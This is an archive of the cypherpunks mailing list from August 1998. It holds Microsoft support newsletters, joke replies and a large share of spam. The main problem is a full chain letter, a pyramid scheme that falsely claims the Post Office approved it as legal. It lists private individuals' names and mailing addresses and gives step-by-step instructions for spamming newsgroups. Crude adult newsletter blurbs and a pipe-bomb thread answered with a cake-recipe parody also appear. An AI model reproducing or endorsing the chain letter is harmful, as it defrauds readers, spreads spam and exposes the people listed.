http://support.microsoft.com/support/kb/articles/q191/3/66.asp

Two PC Cards Detected for Every One Inserted into Your Computer (Q191364)
http://support.microsoft.com/support/kb/articles/q191/3/64.asp

Cannot Log on to Network or Gain Access to Network Resources (Q191291)
http://support.microsoft.com/support/kb/articles/q191/2/91.asp

Cannot Install 3Com 3C905B Network Adapter in Windows 98 (Q191283)
http://support.microsoft.com/support/kb/articles/q191/2/83.asp

Error Message: Couldn't Load Cmf.dll, Check BinDir in Xcm.ini (Q191269)
http://support.microsoft.com/support/kb/articles/q191/2/69.asp

Windows 98 Setup Stops Responding While Trying to Play a Sound (Q191257)
http://support.microsoft.com/support/kb/articles/q191/2/57.asp

Tools Are Unavailable on Windows 98 (Retail Version) Boot Disk (Q191252)
http://support.microsoft.com/support/kb/articles/q191/2/52.asp

No Default MIDI Output Device in Multimedia Properties (Q191249)
http://support.microsoft.com/support/kb/articles/q191/2/49.asp

Err Msg: Cannot Find Program.exe Needed for Opening Files... (Q191219)
http://support.microsoft.com/support/kb/articles/q191/2/19.asp

Problems Using Media Player to Play .avi Files (Q191195)
http://support.microsoft.com/support/kb/articles/q191/1/95.asp

Cannot Access NDS Resources After Reinstalling Windows 98 (Q191185)
http://support.microsoft.com/support/kb/articles/q191/1/85.asp

SHIFT+TAB Does Not Work as Expected on Windows 98 Desktop (Q191171)
http://support.microsoft.com/support/kb/articles/q191/1/71.asp


Internet Explorer for Windows 95 and Windows NT 4.0
---------------------------------------------------

McAfee WebScanX 3.1.2 Does Not Detect or Restrict Browsing (Q191633)
http://support.microsoft.com/support/kb/articles/q191/6/33.asp

Err Msg: Explorer Caused an Invalid Page Fault in Module... (Q191607)
http://support.microsoft.com/support/kb/articles/q191/6/07.asp

Web Sites Open in the Search Bar (Q191580)
http://support.microsoft.com/support/kb/articles/q191/5/80.asp

Channel Bar Icons Appear as Folder Icons (Q191426)
http://support.microsoft.com/support/kb/articles/q191/4/26.asp

How to Enable Preview for Multimedia Files (Q191242)
http://support.microsoft.com/support/kb/articles/q191/2/42.asp

Update Available for Window.External JScript Security Issue (Q191200)
http://support.microsoft.com/support/kb/articles/q191/2/00.asp


Windows CE
----------

Err Msg: Microsoft Outlook Synchronization Service Failed...(Q191374)
http://support.microsoft.com/support/kb/articles/q191/3/74.asp


Windows 95
----------

Dial-Up Networking 1.3 Upgrade Available (Q191494)
http://support.microsoft.com/support/kb/articles/q191/4/94.asp

Conflicts Visible in Device Manager But Devices Work Correctly (Q191312)
http://support.microsoft.com/support/kb/articles/q191/3/12.asp

Cannot Change Password with DUN 1.2b and 128-Bit Encryption (Q191192)
http://support.microsoft.com/support/kb/articles/q191/1/92.asp

You Receive Error Messages When You Click Dial Properties (Q191152)
http://support.microsoft.com/support/kb/articles/q191/1/52.asp

Customizing Windows for Individuals with Disabilities (Q165486)
http://support.microsoft.com/support/kb/articles/q165/4/86.asp


Internet Explorer for UNIX
--------------------------

Internet Explorer and Outlook Express Hangs Window Manager (Q191514)
http://support.microsoft.com/support/kb/articles/q191/5/14.asp

Update Available for Window.External JScript Security Issue (Q191200)
http://support.microsoft.com/support/kb/articles/q191/2/00.asp


Get Support Online Articles by E-mail
-------------------------------------

You can also receive these articles (and others) in e-mail by sending a message to mshelp@microsoft.com. In the Subject line of your message
enter the Article-ID number (Qnnnnnn). For example to receive Q162721
your Subject line should resemble the following example:

Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple Article-ID numbers separated by a comma. For example:

Subject: Q178049
Q174914
Q174062

To receive an index of articles
enter "Index" (without quotation marks) in the Subject line. For example:

Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp
see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Visit Support Online
--------------------

We also encourage you to visit Support Online at
http://support.microsoft.com/support/
to see our complete selection of helpful articles designed to answer questions about using Microsoft products.

Sincerely,
The Support Online Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol <anyuser@anyuser.com>
Date: Sun, 23 Aug 1998 11:18:09 -0700 (PDT)
To: <cstanley@direct.ca>
Subject: Subject: PLEEEEEEEZ   READ
Message-ID: <18161.236028.18680579 dave@menconi.com>
MIME-Version: 1.0
Content-Type: text/plain





First, I'd like to tell you to REALLY read this and REALLY give it some thought 
before you say, "it doesn't work". It works. But you have to follow it and do 
everything just like it says. Read through this a couple of times to fully understand 
how it works.  Once you get the hang of it, it's easy.  If you need extra cash it's worth 
it.

READ ON.......................



 THIS REALLY CAN MAKE YOU EASY MONEY



A little while back, I was browsing these newsgroups, just like you are

now, and came across an article similar to this that said you could make

thousands of dollars within weeks with only an initial investment of

$6.00! So I thought," Yeah, right, this must be a scam", but like most

of us, but I was curious, so I kept reading. Anyway, it said that you send

$1.00 to each of the 6 names and address stated in the article. You then

place your own name and address in the bottom of the list at #6, and

post the article in at least 200 newsgroups. (There are thousands) No

catch, that was it. The main difference between this system and others

is that you have a mailing list of 6 instead of 5... This means that

your average gain will be app. 15 times higher!!!



So after thinking it over, and talking to a few people first, I thought

about trying it. I figured what have I got to lose except 6 stamps and

$6.00, right?



Like most of us I was a little skeptical and a little worried about the

legal aspects of it all. So I checked it out with the U.S. Post Office

(1-800-725-2161) and they confirmed that it is indeed legal!



Then I invested the measly $6.00.............plus postage



Well GUESS WHAT!!... within 7 days, I started getting money in the mail!

I was shocked! I still figured it would end soon, and didn't give it

another thought. But the money just kept coming in. In my first week, I

made about $20.00 to $30.00 dollars. By the end of the second week I had

made a total of over $1,000.00!!!!!! In the third week I had over

$10,000.00 and it's still growing. This is now my fourth week and I have

made a total of just over $42,000.00 and it's still coming in rapidly.......



It's certainly worth $6.00, and 6 stamps, I spent more than that on the

lottery!!



Let me tell you how this works and most importantly, why it

works....also, make sure you print a copy of this article NOW, so you

can get the information off of it as you need it. The process is very

simple and consists of 3 easy steps:



STEP 1: Get 6 separate pieces of paper and write the following on each

piece of paper "PLEASE PUT ME ON YOUR MAILING LIST" (include your name 
and address). Now get 6 US$1.00

bills (or equivalent in your local currency) and place ONE inside EACH

of the 6 pieces of paper so the bill will not be seen through the

envelope to prevent thievery. Next, place one 

paper in each of the 6 envelopes and seal them. You should now have 6

sealed envelopes, each with a piece of paper stating the above phrase,

your name and address, and a $1.00 bill. What you are doing is creating

a service by this. THIS IS ABSOLUTELY LEGAL!



Mail the 6 envelopes to the following addresses





#1 PM 

4855 E. Brown Rd #103

Mesa, Arizona, 85205



#2 D Richardson

4876 Princess Ann Rd # 118  
Box 319
Va Beach, Virginia, 23462



#3 CWright

5384 Liecester Ct

Va Beach, Virginia, 23462



#4 G. Fox

4 Amber Beach Rd

Marietta, NY 13110



#5 s cadwell
po box 5905
rochester,mn 55903


#6  M Evans

P.O. Box 30866

Phoenix, AZ  85036


STEP 2: Now take the #1 name off the list that you see above, move the

other names up (6 becomes 5, 5 becomes 4, etc...) and add YOUR Name as

number 6 on the list.




STEP 3: Change anything you need to, but try to keep this article as

close to original as possible. Now, post your amended article to at

least 200 newsgroups. (I think there is close to 24,000 groups) All you

need is 200, but remember, the more you post, the more money you make!



Don't know HOW to post in the newsgroups? Well do exactly the following:



-----------------------------------------------------------

DIRECTIONS - HOW TO POST TO NEWSGROUPS

-----------------------------------------------------------



Step 1. You do not need to re-type this entire letter to do your

own posting. Simply put your cursor at the beginning of this

letter and click and hold down your mouse button. While

continuing to hold down the mouse button, drag your cursor to the

bottom of this document and over to just after the last

character, and release the mouse button. At this point the entire

letter should be highlighted. Then, from the 'edit' pull down

menu at the top of your screen select 'copy'. This will copy

the entire letter into the computers memory.



Step 2. Open a blank 'notepad' file and place your cursor at the

top of the blank page. From the 'edit' pull down menu select

'paste'. This will paste a copy of the letter into notepad so

that you can add your name to the list. Remember to eliminate the

#1 position, move everyone up a spot (re-number everyone elses

positions), and add yourself in as #6.



Step 3. Save your new notepad file as a .txt file. If you want

to do your postings in different sittings, you'll always have

this file to go back to.



----------------------------------------

FOR NETSCAPE USERS:

----------------------------------------



Step 4. Within the Netscape program, go to the pull-down window

entitled 'Window' select 'NetscapeNews'. Then from the pull down

menu 'Options', select 'Show all Newsgroups'. After a few moments

a list of all the newsgroups on your server will show up. Click

on any newsgroup you desire. From within this newsgroup, click on

the 'TO NEWS' button, which should be in the top left corner of

the newsgroups page. This will bring up a message box.



Step 5. Fill in the Subject. This will be the header that

everyone sees as they scroll through the list of postings in a

particular group.



Step 6. Highlight the entire contents of your .txt file and copy

them using the same technique as before. Go back to the newsgroup

'TO NEWS' posting you are creating and paste the letter into the

body of your posting.



Step 7. Hit the 'Send' Button in the upper left corner. You're

done with your first one! Congratulations...



--------------------------------------------------

INTERNET EXPLORER USERS:

--------------------------------------------------



Step 4. Go to newsgroups and select 'Post an Article'.



Step 5. Fill in the subject.



Step 6. Same as #6 above



Step 7. Hit the 'Post' button.



-------------------------------------------



THAT'S IT! All you have to do is jump to different newsgroups and post

away, after you get the hang of it, it will take about 30 seconds for

each newsgroup!



**REMEMBER, THE MORE NEWSGROUPS YOU POST IN, THE MORE MONEY 
YOU

WILL

MAKE!! BUT YOU HAVE TO POST A MINIMUM OF 200**



That's it! You will begin receiving money from around the world within

day's! You may eventually want to rent a P.O.Box due to the large amount

of mail you receive. 

**MAKE SURE ALL THE ADDRESSES ARE CORRECT.**



Now the WHY part:



Out of 200 postings, say I receive only 5 replies (a very low example).

So then I made $5.00 with my name at #6 on the letter. Now, each of the

5 persons who just sent me $1.00 make the MINIMUM 200 postings, each

with my name at #5 and only 5 persons respond to each of the original 5,

that is another $25.00 for me, now those 25 each make 200 MINIMUM

posts with my name at #4 and only 5 replies each, I will bring in an

additional $125.00! Now, those 125 persons turn around and post the

MINIMUM 200 with my name at #3 and only receive 5 replies each, I will
make an additional $626.00! OK, now here is the fun part, each of those

625 persons post a MINIMUM 200 letters with my name at #2 and they each

only receive 5 replies, that just made me $3,125.00!!! Those 3,125

persons will all deliver this message to 200 newsgroups with my name at

#1 and if still 5 persons per 200 newsgroups react I will receive

$15,625,00! With a original investment of only $6.00! AMAZING! And as I

said 5 responses is actually VERY LOW! Average is probable 20 to 30! So

lets put those figures at just 15 responses per person. Here is what you



will make:



at #6 $15.00



at #5 $225.00



at #4 $3,375.00



at #3 $50,625.00



at #2 $759,375.00



at #1 $11,390,625.00



When your name is no longer on the list, you just take the latest

posting in the newsgroups, and send out another $6.00 to names on the

list, putting your name at number 6 again. And start posting again. The

thing to remember is, do you realize that thousands of people all over

the world are joining the Internet and reading these articles everyday,

JUST LIKE YOU are now!! So can you afford $6.00 and see if it really

works?? I think so... People have said, "what if the plan is played out

and no one sends you the money? So what! What are the chances of that

happening when there are tons of new honest users and new honest people

who are joining the Internet and newsgroups everyday and are willing to

give it a try? Estimates are at 20,000

to 50,000 new users, every day, with thousands of those joining the

actual Internet. Remember, play FAIRLY and HONESTLY and this will work.

You just have to be honest.



Make sure you print this article out RIGHT NOW, also. Try to keep a list

of everyone that sends you money and always keep an eye on the

newsgroups to make sure everyone is playing fairly. Remember, HONESTY IS

THE BEST POLICY. You don't need to cheat the basic idea to make the

money!!



GOOD LUCK to all and please play fairly and reap the huge rewards from

this, which is tons of extra CASH

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Sun, 23 Aug 1998 13:25:57 -0700 (PDT)
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: NSA and Industry Deal
In-Reply-To: <199808221722.NAA06704@cti06.citenet.net>
Message-ID: <Pine.SUN.3.91.980823152146.564A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Aug 1998, Jean-Francois Avon wrote:

> HHHA!  Some investigators crack DNA code like most peoples crack open a 
> box of Rice Krispies; Snap, Pop and Crack!


	Well, Rice Crispies and Monica Lewinsky both have a tendency 
	to talk when splashed with a white, milky substance....

							-Caj


	[Paraphrased from a joke told on Late Night w/ Conan O'Brian] 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Sun, 23 Aug 1998 13:34:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
In-Reply-To: <Pine.BSF.3.91.980821054518.23482E-100000@mcfeely.bsfs.org>
Message-ID: <Pine.SUN.3.91.980823152602.564B-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Aug 1998, Rabid Wombat wrote:

> > >>>Send me info on how to make a pipe bomb. HoppyF1315
> 
> OK-

	[snip recipe]

	Funny thing is, if this recipe was actually printed in the 
	_Anarchist's Cookbook_, Bill Powell probably would have screwed
	it up to the point that it *would* blow somebody's arm off.

							-Caj

	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zipa21@kyla.kiruna.se (  Photo Transfer Specialties)
Date: Sun, 23 Aug 1998 08:28:18 -0700 (PDT)
To: zipa21@kyla.kiruna.se
Subject: MOUSEPADS....with your FAVORITE PHOTO!
Message-ID: <199808232540IAA3189@OnthewebMkt.zlin.vutbr.cz>
MIME-Version: 1.0
Content-Type: text/plain


                     *  GREAT GIFT IDEA! *



          NOW YOU CAN HAVE MOUSE PADS AND T-SHIRTS WITH YOUR 
                  FAVORITE PHOTOS PRINTED ON THEM!



IT'S TIME TO REPLACE YOUR OLD, FRAYED, BORING MOUSEPAD WITH YOUR FAVORITE PHOTOS!

IT'S TIME TO SHOW OFF YOUR FAVORITE PHOTOS ON THE HIGHEST QUALITY
T- SHIRTS AVAILABLE.... HAINES  100% COTTON   BEEFY T'S!


     GREAT GIFTS!    GREAT BUSINESS PROMOTIONS!    GREAT GIFTS!

     

      DAILY REMINDERS OF SPECIAL PEOPLE, PLACES, AND MOMENTS
      WITH PERSONALIZED      MOUSE PADS AND T-SHIRTS !

   
 
        	KIDS  
	          PETS
                   WEDDINGS   
                     LOVED ONES  
   
               
 
              USE YOUR IMAGINATION !

  

 We use the latest technology available to
 provide you with the highest resolution photo transfer available. 


-  MOUSE PADS .... HIGHEST QUALITY "no fray" cloth tops with 1/4" thick
                              non-skid rubber bottoms.

-  T-Shirts .... HIGHEST QUALITY Comfortable, 100% cotton, breathable
                     non-plastic, machine washable.  


 

       GREAT GIFTS!    GREAT BUSINESS PROMOTIONS!    GREAT GIFTS!

   

   All you need to do is send us your favorite 3x5, 4x6, 5x7, 8x10, 
   or even polaroid photos! Please do not send negatives.

   Your photos  WILL BE RETURNED TO YOU! 


                   

                        E-Z ORDER FORM 


MOUSE PADS

    Photo Mouse Pad                           $14.99 Each
    Shipping and Handling                   $  1.50 Each
    Ca. Residents only (tax)                $  1.09 Each


T-SHIRTS
   
    Photo T-Shirts                               $16.99 Each
    Shipping and Handling                    $  1.50 Each
    Ca. Residents only (tax)                 $  1.35 Each

    Please print and circle size:

  
   1)    Small    Medium    Large   Xlarge    XXlarge

   2)    Small    Medium    Large   Xlarge    XXlarge

   3)    Small    Medium    Large   Xlarge    XXlarge

    
   * Two sided T-shirts available for an additional $5.00
      You MUST indicate which photo is for the front and back.


Your Name           __________________________________
Phone Number     __________________________________
Shipping Address __________________________________
City,State,Zip        __________________________________


Please mail check or money order to:


Photo Transfer Specialties
P.O. Box #782
Ross, Ca.
94957


Please allow 14 days for delivery.







































































































                                       end
























      





      
 
o%opher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 23 Aug 1998 14:50:04 -0700 (PDT)
To: (STUFFED SUNDAY AUGUST 23 1998)
Subject: Clinton's finger to the world?/Man's toe gets stuck in G/F's pussy
Message-ID: <19980823200112.12266.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Was it Monica's tie Clinton wore on his Monday night address?

+ EIGHT GORGEOUS CENTERFOLD GIRLS DISPLAYING ALL THEIR NAKED BEAUTY
+ Crafty bar owner gets around topless dancer ban
+ Freeze-O-Pants: New, air conditioned pants
+ How to bed two room mates at once by Matt Miller
+ Invasion of the super snatch: Vagina-resembling aliens land
+ New cure for premature ejaculation
+ Sex vortex surrounds the Wiite House, psychic reveals
+ Women are Easy, chapter 12: Where do I find the women I desire, part III
+ Today's Sexy Story: "We always share"
+ Loads and loads more stuff!

       ---->   http://stuffed.net/98/8/23/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/23/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RedOmega <RedOmega@iname.com>
Date: Sun, 23 Aug 1998 19:43:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.1.32.19980823224541.00689c80@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001691@news.newswire.microsoft.com>
Date: Mon, 24 Aug 1998 02:16:16 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Microsoft Office Support News Watch - August 24, 1998
Message-ID: <199808240916.CAA29861@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft Office Support News Watch
===================================

As a subscriber to the Microsoft Office Support News Watch, you receive e-
mail twice each month that highlights some of the new articles recently
published on Support Online, Microsoft's award-winning technical support
Web site.

Outlook 98 Updated Security Patch
=================================

Microsoft has made an updated patch available for Microsoft Outlook 98 that
protects customers against a potential vulnerability involving file
attachments with extremely long file names as well a variant found during
continued testing.

The original vulnerability was caused by improper handling of file
attachments with very long filenames in Outlook 98. As part of our on-going
security review, we discovered a variant of this vulnerability, which this
updated patch addresses. Microsoft strongly recommends that all users
download the updated patch to be protected against these vulnerabilities.

For information about how to obtain the updated security patch see
Knowledge Base article Q175807. This article is available on the Web at the
following address:

   http://support.microsoft.com/support/kb/articles/Q175/8/07.asp

Get Support Online Articles by E-mail
=====================================

You can also access Knowledge Base articles in e-mail by sending a message
to mshelp@microsoft.com. In the Subject line of your message, enter the
Article-ID number (Qnnnnnn). For example, to receive Q162721, your Subject
line should resemble the following:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple
Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) in
the Subject line. For example:

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, see
http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Sincerely,
The Microsoft Support Online Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DirectServer
Date: Mon, 24 Aug 1998 00:39:02 -0700 (PDT)
To: @toad.com
Subject: Stay Home, Lose Weight, Make Money!
Message-ID: <199808240738.AAA29265@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Stay Home, Lose Weight, Make Money!

If you'd like to lose weight or make money or BOTH, I'd like to send 
you a FREE report that will give you an advantage you never knew you had.

This information does not promote a specific company or "magic" product,
rather it offers insight to a special system of marketing that has been quietly
successful for many people and I am now willing to sharing it for a limited time.

To recieve your FREE report simply request "MORE INFO" in the subject field,
leaving the message area blank. 

Please do not hit reply. E-mail request for MORE INFO here:  funbiz@a-vip.com




This offer is not likely to be made again. If you would like
to be take off this mail list however, please write " VOID"
in the subject line and leave the message area blank and your request
shall be honor immediatly. Request here:  voidlist@hotmail.com Thankyou. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 23 Aug 1998 09:22:38 -0700 (PDT)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Pipe
In-Reply-To: <00b001bdcd89$846d2140$8e2193d0@marcmaff>
Message-ID: <3.0.5.32.19980824022247.008ef350@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


You forgot to slice it, and to add the garlic, and butter,,,,<heeeheee>

At 06:37 AM 8/21/98 -0400, Rabid Wombat wrote:
>
>On Fri, 21 Aug 1998, Marc Maffei wrote:
>
>> please somebody give them the info so that they take themselves out of our
>> misery, since obviously they will botch the job and will give us great
>> pleasure with all the fireworks.
>> 
>> >>>Send me info on how to make a pipe bomb. HoppyF1315
>
>OK-
>
>THIS INFORMATION IS PROVIDED FOR EDUCATIONAL USE ONLY! DO NOT TRY THIS AT 
>HOME, UNLESS YOU KNOW WHAT YOU ARE DOING!!! BETTER YET, DO NOT ACTUALLY 
>USE THESE INSTRUCTIONS, AND BE CAREFUL WHO YOU SHARE THEM WITH! IT IS 
>MUCH SAFER IF YOU HAVE STUDIED THIS IN SCHOOL, AND ARE NOT A RANK AMATUER!
>
>Here's something you can make using basic household chemicals, in your
>kitchen. Be careful, or you'l make a real mess. You can make several
>seperate batches of this, and combine after cooled, but don't try making
>larger batches in one pass, as this can get out of hand quickly. (Sorry,
>but I don't have the metric conversions for this - you're on your own
>there, and this won't really live up to expectations if you use metric 
>conversion, anyway ...)
>
>Carefully sift a pound of household flour, gradually combining with 1/2
>teaspoon sodium chloride. Be sure that the mixture is uniform, without
>clumping.  Aerate until smooth (in a non-reactive vessel, such as a PYREX
>bowl) a pound of emulsified milk fat, and gradually add 1 pound of
>granulated sucrose (available at the grocer's). Add the yolks from 10
>eggs. Use a hand mixer to mix this, and get the mixture as "LITE" as
>possible. Sift the sifted flour/sodium chloride mixture in very slowly -
>MAKE SURE TO KEEP THE MIXTURE UNIFORM, AND DON'T ALLOW "LUMPS" TO FORM -
>IF YOU BEGIN TO SEE THIS, SLOW DOWN THE RATE AT WHICH YOU ARE ADDING THE
>BASE flour/Sodium Chloride MIX, AND STIR BETTER! Stir in a teaspoon of
>extract of vanilla (CAUTION, THIS CONTAINS ALCOHOL, WHICH IS FLAMMABLE!)
>and make sure to distribute evenly throughout the mixture. Add a 1/2
>teaspoon of Citric Acid in an aqueous solution. Carefully add the egg
>whites, distributing evenly.  Continue to stir this mixture until it
>starts to become stiff and hard to stir, but TAKE CARE THAT IT DOES NOT
>BEGIN TO BECOME DRY (stop mixing before it reaches this point!).  Use
>butter or shortening to grease the inside of two bread loaf pans SO THAT
>THE MIXTURE DOES NOT STICK TO THE SIDES OF THE METAL PANS.  Pour half of
>the mixture SLOWLY into each pan. Use an oven to "bake" this mixture - let
>the oven heat up to 300 degrees (farenheit), then put the pans in. You
>will need about 1.25 hours for the heat conversion to occur. Be sure NOT
>TO LEAVE THE PANS IN TOO LONG!!! If you see that the mixture is taking on
>a "DRY" LOOK, or is "SHRINKING" AWAY FROM THE SIDES OF THE PAN, CAREFULLY
>REMOVE AT ONCE!! MAKE SURE TO HANDLE THE PANS WITH PROTECTIVE GLOVES, AS
>THEY WILL BE HOT! YOU DON'T WANT TO DROP THIS ON THE FLOOR AT THIS POINT!
>Carefully set the pans down (slowly) where the heat from the pans will not
>cause damage, and where the pans can be LEFT UNDISTURBED for several
>hours. Allow the mixture to cool until the sides and the bottom of the pan
>are cool to the touch - at this moint, the mixture will be safe to handle. 
>
>This should make enough to fill several pipes, depending on size. Be very 
>careful when packing the mixture into the pipe, and make sure that you 
>don't get any of the mixture into the pipe threads, as this can get very 
>messy. 
>
>
>

	"Nothing is impossible for the man who doesn't have to do it 
	himself." 
						--Weiler's Law




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 24 Aug 1998 05:50:37 -0700 (PDT)
To: "'Rabid Wombat'" <wombat@mcfeely.bsfs.org>
Subject: RE: Pipe
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8396@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Rabid Wombat[SMTP:wombat@mcfeely.bsfs.org]
> 
kindly shared his pipe bomb filler mix with us

I can't help noticing the 1:1 ratio of crystallised 
glucose-alpha-2-fructose  to finely ground
 _Triticum_aestivum_  endosperm.

This may be evidence that North Americans do, indeed, 
have  a sweet tooth.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xallnite1@hotmail.com
Date: Mon, 24 Aug 1998 08:35:50 -0700 (PDT)
To: <curt@toad.com>
Subject: For Men Only
Message-ID: <199808241535.IAA02129@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi

Men - Regardless of how good you are - 
The Performance Technique will make you better.

In fact - most women will think you're fantastic.

Women - Here's your chance to show that special man how to be a great 
lover.Make your own XXX sex tonight.

Visit the Performance Technique Home Page:

 Click Here

Or go to:http://209.139.56.159

Good luck - Have fun - Have great sex




Removal Instructions
------------------------------------------------------------------------
The Mailing List that you are being mailed from was filtered against
the Global Remove List at: http://remove-list.com

Remove-List is a free public service offering to help the general public 
get removed from bulk mailings lists and has not been sent this message. 
If you want their help please add your name to their list and you will 
not receive a bulk email from us or other ethical bulk emailer.
------------------------------------------------------------------------
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Mon, 24 Aug 1998 03:38:54 -0700 (PDT)
To: (STUFFED MONDAY AUGUST 24 1998)
Subject: It REALLY is a weird world: read our amazing stories/Man caught D.U.I. on lawnmower and NAKED!
Message-ID: <19980824071000.25090.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


For the oddest, funniest and sexiest news, you'll read it first in Stuffed!

+ EIGHT GORGEOUS CENTERFOLD GIRLS DISPLAYING ALL
  THEIR NAKED BEAUTY (Lesbian special today)
+ Orgasm convention takes place in New Dehli
+ Guess the verdict: Canadian Juror has affair
  with defendant
+ Women are Easy, Chapter 13: A plan of attack -
  "Mates to get Dates", by Johnny Shack
+ Breast Stop: A busty babe's car runs off the
  road when her 42DDs get caught in the steering
+ Today's Sexy Story: "In the Office"
+ Loads and loads more...

       ---->   http://stuffed.net/98/8/24/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/24/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <banisar@epic.org>
Date: Mon, 24 Aug 1998 06:34:22 -0700 (PDT)
